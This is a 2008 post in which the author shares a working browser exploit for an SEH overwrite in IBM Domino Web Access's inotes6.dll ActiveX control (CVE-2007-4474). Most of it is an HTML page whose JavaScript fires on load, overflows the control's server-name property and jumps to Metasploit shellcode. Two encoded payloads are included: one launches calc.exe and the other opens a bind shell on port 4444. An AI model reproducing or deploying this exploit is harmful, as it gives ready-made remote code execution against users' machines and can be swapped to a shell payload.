inotes6-overwrite.txt
Posted on 01 January 2008
My first attempt at an SEH overwrite exploit. Anyhow, I first posted about this issue regarding version 7 of this control, Will Dormann of the CERT/CC discovered versions 6 and 6.5 are vulnerable too, see http://www.kb.cert.org/vuls/id/963889. Dwa7w.dll and inotes6w.dll are unicode, thats my next project. Code is inline and attached. --------------------- <!-- written by e.b. IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit Bad chars: 0x80+ CVE-2007-4474 Tested on Windows XP SP2(fully patched) English, IE6, inotes6.dll version 6.0.40.0 and version 6.0.48.0 Thanks to str0ke for pointing me in the right direction and to h.d.m. and the Metasploit crew --> <html> <head> <title>IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit</title> <script language="JavaScript" defer> function Check() { var buf = 'A'; while (buf.length <= 3119) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" + "%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" + "%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" + "%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" + "%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" + "%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" + "%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" + "%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" + "%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" + "%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" + "%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" + "%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" + "%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" + "%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" + "%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" + "%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" + "%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" + "%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" + "%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" + "%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" + "%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" + "%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" + "%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" + "%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" + "%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" + "%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" + "%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" + "%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" + "%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" + "%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" + "%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" + "%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" + "%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" + "%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" + "%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" + "%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" + "%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" + "%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" + "%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" + "%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" + "%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" + "%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" + "%4f%68%56%39%6f%38%50%43"); var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis //no SafeSEH var seh_handler = unescape("%50%69%C9%74"); var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90"); var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop; obj.General_ServerName = m; obj.InstallBrowserHelperDll(); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271- 00A024A51325"> Unable to create object </object> </body> </html> --------------------- Elazar -- Compare Cell Phone Carriers- Click Now. http://tagline.hushmail.com/fc/Ioyw6h4fMiW01DlRT5EdxG74bAoErxGvZoOSv1JtIEt847RmpKnqQI/
